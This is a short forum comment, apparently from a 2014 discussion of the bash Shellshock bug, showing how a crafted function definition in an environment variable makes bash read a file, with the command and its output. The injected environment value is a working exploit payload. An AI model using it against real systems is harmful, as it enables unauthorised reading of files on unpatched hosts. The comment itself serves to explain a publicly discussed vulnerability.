|
|
|
|
|
|
by timv
4284 days ago
|
|
|
The same trick can be used to read files as well $ date -u > file1
$ env -i X='() { (a)=<\' bash -c 'file1 cat'
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
Thu Sep 25 02:14:30 UTC 2014
Though obviously it's going to be trickier to find an system that issues commands in a way that can act as a path for that sort of exploit. |
|
|